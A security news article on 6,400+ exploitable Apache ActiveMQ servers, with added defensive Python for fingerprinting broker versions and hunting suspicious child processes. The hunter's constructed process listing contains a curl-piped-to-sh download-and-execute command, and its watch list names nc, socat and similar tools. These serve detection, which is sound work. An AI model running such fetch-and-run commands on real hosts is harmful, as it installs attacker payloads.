Nonprofit security organization Shadowserver has confirmed that over 6,400 Apache ActiveMQ servers exposed on the public internet remain vulnerable to ongoing attacks targeting a high-severity code injection vulnerability. The flaw is being actively exploited in the wild, which places every unpatched, internet-reachable instance at immediate risk.
Apache ActiveMQ Overview
Apache ActiveMQ is one of the most widely deployed open-source message brokers in enterprise environments. It implements the Java Message Service (JMS) API and supports a range of messaging protocols including AMQP, MQTT, STOMP, and OpenWire. ActiveMQ is commonly used by:
- Enterprise applications for asynchronous inter-service communication
- Microservices architectures for event streaming and task queuing
- Financial services for reliable transaction messaging
- Healthcare and critical infrastructure for system integration
The widespread deployment of ActiveMQ across critical industries means that active exploitation of this vulnerability poses a broad risk across sectors.
The Vulnerability
The flaw being actively exploited is a high-severity code injection vulnerability in Apache ActiveMQ that lets a remote attacker execute arbitrary code on an unpatched broker. The affected versions are those listed in the Apache advisory; the instances being attacked are unpatched brokers whose management interface or broker transport ports are reachable from the internet without adequate access controls.
Shadowserver's scan identified more than 6,400 internet-facing ActiveMQ instances that remain vulnerable and unpatched — providing attackers a large pool of targets.
Exploitation in the Wild
Active exploitation has been confirmed, meaning threat actors are already scanning for and attacking vulnerable servers. The threat landscape for ActiveMQ vulnerabilities has precedent: in 2023, a prior critical ActiveMQ vulnerability (CVE-2023-46604) was rapidly weaponized by multiple threat actors including ransomware groups and nation-state actors within days of disclosure.
The current wave of exploitation follows a similar pattern:
1. Attackers scan the internet for exposed ActiveMQ management ports
2. Identify instances running a vulnerable version
3. Send crafted messages exploiting the code injection flaw
4. Achieve remote code execution on the target server
5. Deploy malware payloads — frequently ransomware, cryptominers, or remote access tools
Vulnerable vs. Patched Versions
Organizations should immediately verify what version of Apache ActiveMQ is deployed in their environment. Administrators should check the Apache ActiveMQ security advisories page for the specific versions affected and the patched release for this vulnerability.
General Exposure Indicators
- ActiveMQ admin console accessible on port 8161 from the internet
- OpenWire protocol port (61616) exposed without firewall restrictions
- Outdated ActiveMQ versions running in production
- Absence of authentication on the ActiveMQ management interface
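Checking the second and third indicators does not require the web console: an ActiveMQ broker sends an OpenWire WireFormatInfo frame to every client the moment the TCP connection to 61616 opens, and the property map in that frame carries ProviderName and ProviderVersion. The following is an added example, not code from the article or from the ActiveMQ project. It parses that frame (the loose OpenWire encoding ActiveMQ uses for the handshake before tight encoding is negotiated) and can read it from a live broker; the sample frame, including the version string 5.15.2, is constructed here so the parser runs offline. The code only reports the version; compare it against the versions named in the Apache advisory, which this page does not list.

```python
"""Fingerprint an Apache ActiveMQ broker from its OpenWire handshake (TCP 61616).

Added example, not ActiveMQ tooling. The broker speaks first, sending a
WireFormatInfo frame whose property map includes ProviderVersion. Frame layout
(loose encoding): [u32 size][type=1][8-byte magic "ActiveMQ"][i32 wire version]
[bool props present][i32 props length][i32 entry count][UTF key, typed value]...
"""
import socket
import struct

WIREFORMAT_INFO = 1          # OpenWire command type of the handshake frame
MAGIC = b"ActiveMQ"
# Value type codes used by ActiveMQ's MarshallingSupport inside a primitive map
T_NULL, T_BOOL, T_BYTE, T_CHAR, T_SHORT, T_INT, T_LONG, T_DOUBLE, T_FLOAT, T_STRING = range(10)
_FIXED = {T_BYTE: ">b", T_SHORT: ">h", T_INT: ">i", T_LONG: ">q", T_DOUBLE: ">d", T_FLOAT: ">f"}


def _read_utf(buf: bytes, pos: int):
    (n,) = struct.unpack_from(">H", buf, pos)          # Java writeUTF: 2-byte length prefix
    return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n


def _read_primitive(buf: bytes, pos: int):
    t, pos = buf[pos], pos + 1
    if t == T_NULL:
        return None, pos
    if t == T_BOOL:
        return buf[pos] != 0, pos + 1
    if t == T_STRING:
        return _read_utf(buf, pos)
    if t in _FIXED:
        fmt = _FIXED[t]
        return struct.unpack_from(fmt, buf, pos)[0], pos + struct.calcsize(fmt)
    raise ValueError(f"unsupported primitive type code {t}")


def parse_wireformat_info(frame: bytes) -> dict:
    """Return the wire version and property map of a WireFormatInfo frame."""
    if len(frame) < 4:
        raise ValueError("short frame")
    (size,) = struct.unpack_from(">I", frame, 0)
    body = frame[4:4 + size]
    if len(body) != size:
        raise ValueError("truncated frame")
    if body[0] != WIREFORMAT_INFO or body[1:9] != MAGIC:
        raise ValueError("not a loose-encoded OpenWire WireFormatInfo frame")
    (wire_version,) = struct.unpack_from(">i", body, 9)
    props, pos = {}, 13
    if body[pos]:                                      # loose boolean: properties present
        (blob_len,) = struct.unpack_from(">i", body, pos + 1)
        blob = body[pos + 5:pos + 5 + blob_len]
        (count,) = struct.unpack_from(">i", blob, 0)
        p = 4
        for _ in range(count):
            key, p = _read_utf(blob, p)
            props[key], p = _read_primitive(blob, p)
    return {"wire_version": wire_version, "properties": props}


def build_wireformat_info(wire_version: int, props: dict) -> bytes:
    """Marshal a frame the way the broker does; used only to construct the sample."""
    blob = struct.pack(">i", len(props))
    for key, val in props.items():
        kb = key.encode("utf-8")
        blob += struct.pack(">H", len(kb)) + kb
        if isinstance(val, bool):                      # check bool before int (bool is an int)
            blob += bytes([T_BOOL, int(val)])
        elif isinstance(val, int):
            blob += bytes([T_INT]) + struct.pack(">i", val)
        else:
            vb = str(val).encode("utf-8")
            blob += bytes([T_STRING]) + struct.pack(">H", len(vb)) + vb
    body = bytes([WIREFORMAT_INFO]) + MAGIC + struct.pack(">i", wire_version)
    body += b"\x01" + struct.pack(">i", len(blob)) + blob
    return struct.pack(">I", len(body)) + body


# Constructed sample: the property names a 5.x broker advertises, with a made-up version.
SAMPLE_FRAME = build_wireformat_info(12, {
    "TcpNoDelayEnabled": True, "SizePrefixDisabled": False, "CacheSize": 1024,
    "ProviderName": "ActiveMQ", "StackTraceEnabled": True, "PlatformDetails": "Java",
    "CacheEnabled": True, "TightEncodingEnabled": True, "ProviderVersion": "5.15.2",
})


def broker_version(frame: bytes) -> str:
    p = parse_wireformat_info(frame)["properties"]
    return f"{p.get('ProviderName', '?')} {p.get('ProviderVersion', '?')}"


def _recv_exact(s: socket.socket, n: int) -> bytes:
    data = b""
    while len(data) < n:
        chunk = s.recv(n - len(data))
        if not chunk:
            raise ConnectionError("connection closed mid-frame")
        data += chunk
    return data


def fingerprint(host: str, port: int = 61616, timeout: float = 5.0) -> dict:
    """Read the broker's handshake from a live host without sending any bytes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        head = _recv_exact(s, 4)
        body = _recv_exact(s, struct.unpack(">I", head)[0])
    return parse_wireformat_info(head + body)


if __name__ == "__main__":
    import sys
    frame_info = fingerprint(sys.argv[1]) if len(sys.argv) > 1 else None
    print(broker_version(SAMPLE_FRAME) if frame_info is None else broker_version(SAMPLE_FRAME) and f"{frame_info['properties'].get('ProviderName', '?')} {frame_info['properties'].get('ProviderVersion', '?')}")
```

Run it with a hostname to query a real broker, or with no arguments to parse the constructed sample. A broker that answers on 61616 from the internet at all is already failing the second indicator; the version it reports decides whether it also fails the third.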
Immediate Remediation Steps
1. Identify Exposed Instances
Use network scanning and asset inventory tools to identify all ActiveMQ deployments in your environment:
# Scan your network range for ActiveMQ default ports
nmap -p 8161,61616,5672,1883,61613 <network_range>
2. Apply the Patch
Update Apache ActiveMQ to the latest patched version immediately. Check the Apache ActiveMQ downloads page for the current stable release.
3. Restrict Network Exposure
If ActiveMQ management interfaces or broker ports are reachable from the internet, restrict access immediately:
- Move ActiveMQ behind a firewall with strict allowlisting
- Require VPN access for administrative interfaces
- Block the admin console (8161) and every broker transport port (61616 for OpenWire, plus 5672, 1883, and 61613 if AMQP, MQTT, or STOMP are enabled) from public internet access at the perimeter
4. Enable Authentication
Ensure that the ActiveMQ broker and management console require authentication. Default ActiveMQ installations often have weak or no credentials on the admin console — change all default passwords immediately.
5. Monitor for Compromise Indicators
Review ActiveMQ logs and host-level telemetry for signs of exploitation:
- Unexpected child processes (shells, curl/wget, scripting interpreters) spawned by the ActiveMQ JVM, which in normal operation spawns nothing
- Unusual outbound network connections from ActiveMQ hosts
- New scheduled tasks, cron jobs, or services created on the host
- Presence of cryptominer or RAT payloads on the system
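The first of those indicators is the cheapest to check on a host that was exposed before patching, because a broker JVM has no legitimate reason to launch a shell or a download utility. The following is an added example, not ActiveMQ tooling or code from the article: it reads `ps -eo pid,ppid,user,comm,args --no-headers` output (Linux procps syntax), finds the broker JVM by its command line, and reports every descendant within a few hops, rating shells and downloaders as high severity. The process listing embedded below is constructed, including the 198.51.100.7 address (documentation range) and the file name x.sh.

```python
"""Hunt for suspicious child processes of an Apache ActiveMQ broker JVM.

Added example, not ActiveMQ tooling. Input is the output of
`ps -eo pid,ppid,user,comm,args --no-headers`; the sample is constructed.
"""
from dataclasses import dataclass

# Interpreters and downloaders that post-exploitation payloads typically invoke.
SUSPICIOUS = {"sh", "bash", "dash", "zsh", "curl", "wget", "python", "python3",
              "perl", "nc", "ncat", "socat", "powershell", "cmd.exe", "certutil"}
MAX_DEPTH = 3        # java -> sh -> curl is depth 2; allow one more hop


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    user: str
    comm: str        # executable basename as ps reports it
    args: str        # full command line


def parse_ps(output: str) -> list:
    """Parse `ps -eo pid,ppid,user,comm,args --no-headers` lines into Proc records."""
    procs = []
    for line in output.splitlines():
        if not line.strip():
            continue
        pid, ppid, user, comm, args = line.split(None, 4)   # args may contain spaces
        procs.append(Proc(int(pid), int(ppid), user, comm, args))
    return procs


def is_activemq_broker(p: Proc) -> bool:
    return p.comm in ("java", "java.exe") and "activemq" in p.args.lower()


def suspicious_spawns(procs: list) -> list:
    """Return every descendant (within MAX_DEPTH hops) of a broker JVM, with a severity."""
    by_pid = {p.pid: p for p in procs}
    brokers = {p.pid for p in procs if is_activemq_broker(p)}
    findings = []
    for p in procs:
        if p.pid in brokers:
            continue
        parent, depth = by_pid.get(p.ppid), 1
        while parent is not None and depth <= MAX_DEPTH:
            if parent.pid in brokers:
                findings.append({
                    "pid": p.pid, "comm": p.comm, "user": p.user, "args": p.args,
                    "broker_pid": parent.pid, "depth": depth,
                    # a shell or downloader is the classic post-exploitation footprint;
                    # anything else under the broker is still worth a look
                    "severity": "high" if p.comm in SUSPICIOUS else "medium",
                })
                break
            parent, depth = by_pid.get(parent.ppid), depth + 1
    return findings


# Constructed listing: a broker that spawned a shell piping a remote script into sh,
# next to an unrelated admin SSH session that also runs curl and must not be flagged.
SAMPLE_PS = """\
   1     0 root     systemd  /sbin/init
1200     1 activemq java     /usr/bin/java -Xms64M -Dactivemq.home=/opt/activemq -jar /opt/activemq/bin/activemq.jar start
1337  1200 activemq sh       sh -c curl -s http://198.51.100.7/x.sh | sh
1338  1337 activemq curl     curl -s http://198.51.100.7/x.sh
2000     1 root     sshd     sshd: admin [priv]
2001  2000 admin    bash     -bash
2002  2001 admin    curl     curl https://example.org/
"""


if __name__ == "__main__":
    import json
    import subprocess
    live = subprocess.run(["ps", "-eo", "pid,ppid,user,comm,args", "--no-headers"],
                          capture_output=True, text=True, check=True).stdout
    for finding in suspicious_spawns(parse_ps(live)):
        print(json.dumps(finding))
```

Run on the live host it prints one JSON line per finding; on the constructed listing it flags pid 1337 (sh, depth 1) and 1338 (curl, depth 2) under broker 1200 and ignores the admin's curl. A finding of any severity on a host that was internet-exposed before patching means the host should be handled as a suspected compromise, not simply patched.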
Historical Context: ActiveMQ as an Attack Target
Apache ActiveMQ has been a recurring target for sophisticated threat actors. CVE-2023-46604, a critical RCE vulnerability disclosed in October 2023, was weaponized within days by:
- HelloKitty ransomware operators
- Lazarus Group (North Korean state-sponsored actors)
- Cryptomining botnets
- Multiple initial access brokers
The rapid exploitation timeline for that prior vulnerability strongly suggests the current flaw will follow a similar pattern. Organizations with internet-exposed ActiveMQ instances should treat this as an emergency patching priority.
Shadowserver's Role
Shadowserver Foundation is a nonprofit that operates global internet scanning infrastructure to identify and notify organizations about exposed, vulnerable systems. Its count of 6,400+ vulnerable ActiveMQ instances comes from live scanning data and is a lower bound: it includes only hosts that responded to the scan and could be identified as vulnerable, so the pool of easy targets available to attackers right now is at least that large.
Organizations can check if their IPs appear in Shadowserver's vulnerable-host notifications by registering at shadowserver.org.
Key Takeaways
- 6,400+ internet-exposed Apache ActiveMQ servers remain vulnerable to an actively exploited high-severity code injection flaw
- Patch immediately — update to the latest patched ActiveMQ release without delay
- Remove internet exposure — ActiveMQ management interfaces should never be reachable from the public internet
- Enable strong authentication on all ActiveMQ admin interfaces and change any default credentials
- Monitor for compromise — systems that were exposed before patching should be treated as potentially compromised and investigated
Source: BleepingComputer